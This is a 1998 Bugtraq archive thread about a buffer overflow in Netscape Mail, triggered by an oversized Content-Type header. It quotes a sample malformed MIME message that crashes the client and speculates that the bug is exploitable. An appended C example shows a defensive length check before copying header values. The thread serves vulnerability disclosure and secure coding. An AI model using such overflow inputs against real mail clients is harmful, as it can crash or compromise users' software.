Bugtraq mailing list archives
Re: netscape mail overflow(another one)
From: brett () LARIAT ORG (Brett Glass)
Date: Tue, 28 Jul 1998 23:49:04 -0600

It makes perfect sense that any header field could overflow a limited buffer. I'd assumed that developers would have the sense to check ALL of the buffers used to store headers, but maybe this should be pointed out to them, just to make sure.

We may see exploits based on bugs in UUDECODE and BinHex decoders in mailers as well. I'm sure they're there given the overall low quality of the code that these companies are generating (sigh).

--Brett Glass

At 08:21 PM 7/28/98 +0200, Paul Boehm wrote:
> Hi,
>
> netscape mail crashes when trying to the attachment from the following
> pseudo mime mail:
>
> From: Paul Boehm <paul () boehm org>
> To: paul () boehm org
> Subject: test
> Mime-Version: 1.0
> Content-Type: AAAAAAAAAAAAAAAAAAAAAA...; boundary=ABC123
>
> --ABC123
> Content-Type: text/plain; charset=us-ascii
>
> test123
>
> --ABC123
> Content-Type: application/octet-stream
> Content-Transfer-Encoding: base64
> Content-Disposition: attachment; filename="AA"
>
> H4sIAA7jvDUAA+3OOQ6EQBBD0Y45hY9QJejiPI1EBhJiuT+LiEeaAEj+SxzYgdfR09PcLMyU
> JLURdzZX3hopcm49vD6Ks/acZI8/O2zLWmYpTWUbfu/6+Y0/L+uGUn39AQAAAAAAAAAAAAAA
> AADwvx2CTC7aACgAAA==
> --ABC--
>
> i suppose this is exploitable, but i don't really know.
> i only tested this with win95 netscape 4.05.
>
> bye,
> paul
>
> --
> [ Paul S. Boehm | paul () boehm priv at | http://paul.boehm.org/ | infected@irc ]
>
> Money is what gives a programmer his resources. It's an exchange system
> created by human beings. It surrounds us. Works for us, binds the economy
> together.
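
The buffer check discussed in this message, as an added example that is not part of the original posts and not code from any mailer: a header value is copied into a fixed-size buffer only after its length has been compared against the buffer size. The names copy_header_value, prefix_ci and HDR_MAX are hypothetical, and the oversized input is constructed.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define HDR_MAX 64  /* hypothetical size of the fixed buffer for one value */

/* Case-insensitive "does s start with p"; stops safely at the end of s. */
static int prefix_ci(const char *s, const char *p)
{
    for (; *p; s++, p++)
        if (tolower((unsigned char)*s) != tolower((unsigned char)*p))
            return 0;
    return 1;
}

/* Copy the value of header `name` from `line` into out[outsz].
 * Returns 0 on success, -1 if the line is a different field,
 * -2 if the value does not fit. Never truncates silently. */
int copy_header_value(const char *line, const char *name,
                      char *out, size_t outsz)
{
    size_t nlen = strlen(name), len;
    const char *v;

    if (outsz == 0)
        return -2;
    out[0] = '\0';
    if (!prefix_ci(line, name) || line[nlen] != ':')
        return -1;
    v = line + nlen + 1;
    while (*v == ' ' || *v == '\t')     /* skip whitespace after the colon */
        v++;
    len = strcspn(v, "\r\n");           /* value ends at the line ending */
    if (len >= outsz)                   /* len bytes plus the NUL must fit */
        return -2;
    memcpy(out, v, len);
    out[len] = '\0';
    return 0;
}

int main(void)
{
    char buf[HDR_MAX], big[512];
    memset(big, 'A', sizeof big - 1);   /* constructed oversized field */
    big[sizeof big - 1] = '\0';
    memcpy(big, "Content-Type: ", 14);
    printf("normal:    %d\n", copy_header_value("Content-Type: text/plain\r\n", "content-type", buf, sizeof buf));
    printf("oversized: %d\n", copy_header_value(big, "Content-Type", buf, sizeof buf));
    return 0;
}
```

The same length-before-copy check applies to every field a parser stores, including filename= and boundary= parameters.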